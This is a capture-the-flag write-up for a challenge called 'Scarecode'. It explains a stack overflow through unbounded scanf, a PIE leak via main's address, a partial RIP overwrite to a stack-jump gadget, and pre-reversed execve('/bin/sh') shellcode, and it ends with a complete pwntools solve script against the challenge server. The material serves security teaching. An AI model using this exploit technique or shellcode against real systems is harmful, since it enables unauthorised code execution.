Flash CTF - Scarecode

  • Category: Binary Exploitation
  • Target: Stripped 64-bit ELF
  • Protections: PIE, ASLR, NX effectively bypassed by executing stack, no canary in vulnerable path
  • Goal: Gain code execution, spawn shell, read flag.txt

Recon: First Interaction

Running the binary shows a looped prompt:

  • “Welcome to Scarecode!”
  • “Trick or treat? (q to quit)”

Two commands matter:

  • trick: asks for a name, then prints a spooky reversed greeting.
  • treat: prints a pointer-looking hex value.

This strongly hints at a leak-then-overflow flow: leak an address via treat, then exploit trick.

Reverse Engineering Highlights (from the stripped binary)

After disassembly/RE, the important routines look like this:

void trick() { printf("Trick you say?, tell me your name\n"); char name[100]; scanf("%s", name); // unbounded read into 100-byte stack buffer size_t len = strlen(name); for (size_t i = 0; i < len / 2; i++) { char tmp = name[i]; name[i] = name[len - i - 1]; name[len - i - 1] = tmp; } printf("OOOoooo... %s ...\n", name);}

Key findings:

  • scanf("%s", name) is unsafe: no bound; it can overflow name and smash saved RIP.
  • Before returning, the buffer is reversed in place. This is the core twist: your input bytes are mirrored on the stack just before trick returns.

The self-leak routine:

void treat() { printf("Have the address of main, as a treat! %p\n", main);}

And a handy two-instruction gadget compiled from an inline asm helper (you won’t know its symbol name in the stripped binary, but you can find the pattern):

void boo() { __asm__("sub $0x10, %rsp"); __asm__("jmp *%rsp");}

Main keeps prompting, letting us call treat and trick in any order:

int main() { printf("Welcome to Scarecode!\n"); while (1) { printf("Trick or treat? (q to quit)\n"); char input[100]; scanf("%99s", input); if (strcmp(input, "trick") == 0 || strcmp(input, "Trick") == 0 || strcmp(input, "TRICK") == 0) { trick(); } else if (strcmp(input, "treat") == 0 || strcmp(input, "Treat") == 0 || strcmp(input, "TREAT") == 0) { treat(); } else { printf("Neither trick nor treat, you say? Well, that's not very festive.\n"); return 1; } }}

Plan of Attack

  1. Use treat to leak the runtime address of main.
  2. Compute PIE base: base = leak(main) - MAIN_OFFSET (I measured MAIN_OFFSET = 0x10e0 for my build; verify yours with RE).
  3. Locate the two-instruction gadget sub rsp, 0x10; jmp *%rsp (found at file VA offset 0x13e4 for me). The runtime address is jmp_rsp = base + 0x13e4.
  4. Overflow via trick to replace saved RIP with jmp_rsp and place trampoline + shellcode on the stack.
  5. Compensate for the in-place reversal by pre-reversing our bytes before sending.

Why a Classic ROP Chain Is Painful Here

  • %s input forbids null bytes:
    • scanf("%s", ...) stops at the first \x00; anything after a zero never reaches the stack.
    • All of our 64-bit addresses within the binary are going to contain \x00 in their high bytes due to canonical addressing and PIE base alignment.
    • A traditional ROP chain requires several packed 8-byte addresses and argument words; avoiding all zeros across all entries is brittle or impossible without elaborate encodings.

Partial Overwrite: Still Enough for the First Jump

We don’t need a full ROP chain. We just need the first controlled transfer to our own code on the stack. Two observations enable this:

  • Partial pointer overwrite suffices on x86_64:
    • Saved RIP is 8 bytes, but in practice we can overwrite just the lower 6 bytes with %s-friendly data. The top two bytes remain as they were.
    • Because our gadget lives in the same mapped module as the original return address (same PIE segment), the top bytes match, so replacing only the low 6 bytes correctly redirects control.
    • In code, that’s akin to using p64(jmp_rsp)[:6] when building the payload. We then reverse those 6 bytes before sending so that after the program’s reversal, the in-memory order is the correct little-endian address.
  • Trampoline instead of chain:
    • We point RIP to the gadget sub rsp, 0x10; jmp *%rsp.
    • At the landing spot, we place a 2-byte instruction jmp short -0x64 (\xEB\x9C) so execution hops back into our NOP sled and shellcode.
    • This avoids long sequences of addresses and arguments. It’s just: overwrite RIP once, land on a short jump, then run raw shellcode.

This approach neatly sidesteps the ROP chain problem: only one address must be placed (the gadget), and it’s feasible with a 6-byte partial overwrite that avoids nulls. Everything else is position-relative shellcode under our control.

Shellcode Layout and Reversal Compensation

Intended in-memory view at return (post-reversal):

  • [saved RIP] = address of sub rsp, 0x10; jmp *%rsp (our gadget)
  • [%rsp] at gadget landing = jmp short -0x64 (2 bytes) to jump back
  • [%rsp - 0x64] = NOP sled + sub rsp, 0x64 + execve("/bin//sh") shellcode + NOPs

Because trick reverses input, we pre-reverse both:

  • The 6-byte little-endian gadget address bytes (so that post-reversal the address is correct).
  • The entire shellcode block (so that post-reversal the bytes read in the intended order).

I also add sub rsp, 0x64 ahead of the execve shellcode to move the stack away from our own bytes so any pushes or writes don’t corrupt the code we’re executing.

End-to-End Exploit Flow

  1. Run program; send treat.
  2. Parse leak: main_leak = int(hex_str, 16).
  3. Compute base: base = main_leak - 0x10e0 (verify your MAIN_OFFSET).
  4. Compute gadget VA: jmp_rsp = base + 0x13e4 (verify your gadget offset).
  5. Build shellcode block:
    • NOP sled + sub rsp, 0x64 + 64-bit execve("/bin//sh") + NOPs
    • Append 2-byte jmp short -0x64 at the top landing
  6. Reverse the shellcode bytes.
  7. Take p64(jmp_rsp)[:6], reverse those 6 bytes.
  8. Construct overflow: [reversed 6-byte RIP] + [reversed shellcode] + [extra NOPs to fill]
  9. Send trick, then send the payload as the name.
  10. On return, control flows: RIP -> gadget -> short jmp -> shellcode -> shell.

Once shell is up, cat flag.txt.

Practical Notes and Pitfalls

  • Ensure no \x00 appears in the transmitted payload region that will be reversed; %s would stop early, and strlen would reduce the reversal range.
  • Always pre-reverse multi-byte values and the entire shellcode block to account for the in-place reversal.
  • The partial overwrite relies on the high two bytes of the saved RIP being compatible with your target gadget (same mapping). Leaking main and using consistent build/remote binary ensures this.
  • Short jmp distance (0x64) is arbitrary but convenient; keep it small and consistent.

Solve Script

#!/usr/bin/env python3import pwnfrom pwn import *import sys# ConfigurationBINARY_PATH = "./scarecode"REMOTE_HOST = "kubenode.mctf.io"REMOTE_PORT = 31083context.binary = BINARY_PATHdef create_shellcode(): # Shellcode to jump backwards 100 bytes (0x64) # Assembly: # jmp short -0x64 # In bytes: \xeb\x9c jmp_backwards = b'\xeb\x9c' execve_shellcode = b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05" #https://www.exploit-db.com/exploits/46907 # Move stack down far away so that our push to the stack doesn't modify our code sub_rsp = asm('sub rsp, 0x64') execve_shellcode = sub_rsp + execve_shellcode #Add padding to our shellcode to help align everything complete_shellcode = b'\x90' * (100 - len(execve_shellcode)) + execve_shellcode + b'\x90' * (20 - len(jmp_backwards)) + jmp_backwards return complete_shellcodedef exploit(): # Load binary binary = ELF(BINARY_PATH) jmp_rsp = 0x13e4 #Found with ROPgadget, sub $0x10, %rsp; jmp *%rsp # Start process #p = process(BINARY_PATH, level='debug') p = remote(REMOTE_HOST, REMOTE_PORT, level='debug') try: # Step 1: Get main address leak print("[+] Getting main address leak...") p.sendlineafter(b"Trick or treat? (q to quit)\n", b"treat") leak_line = p.recvline() print(f"[+] Received: {leak_line}") # Parse the leak leak_str = leak_line.decode().split("Have the address of main, as a treat! ")[1].strip() main_addr = int(leak_str, 16) print(f"[+] Main address: {hex(main_addr)}") # Calculate binary base main_offset = 0x10e0 binary_base = main_addr - main_offset jmp_rsp = jmp_rsp + binary_base print(f"[+] Binary base: {hex(binary_base)}") print(f"[+] jmp *%rsp gadget address: {hex(jmp_rsp)}") # Step 2: Create payload print("[+] Creating payload...") shellcode = create_shellcode() shellcode = shellcode[::-1] print(f"[+] Reversed shellcode: {shellcode.hex()}") return_addr = p64(jmp_rsp)[:6][::-1] print(f"[+] return address: {return_addr.hex()}") payload = return_addr + shellcode + b'\x90' * (120 - len(shellcode)) print(f"[+] Payload length: {len(payload)}") # Step 3: Send payload print("[+] Sending payload...") p.sendlineafter(b"Trick or treat? (q to quit)\n", b"trick") p.sendline(payload) # Step 4: Interact print("[+] Attempting to get shell...") p.interactive() except Exception as e: print(f"[-] Error: {e}") return False finally: p.close() return Truedef main(): exploit()if __name__ == "__main__": main()

Interested in joining our team? Let’s connect!

Let's go

Upskill and assess cybersecurity talent through hands-on, bite-sized scenarios that mirror real work

Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.
About UsSkillBit LabsFor IndividualsCyber CompetitionsTerms of UsePrivacy Policy
Read Our Blog Case StudiesNews + EventsConnect With UsRequest a Demo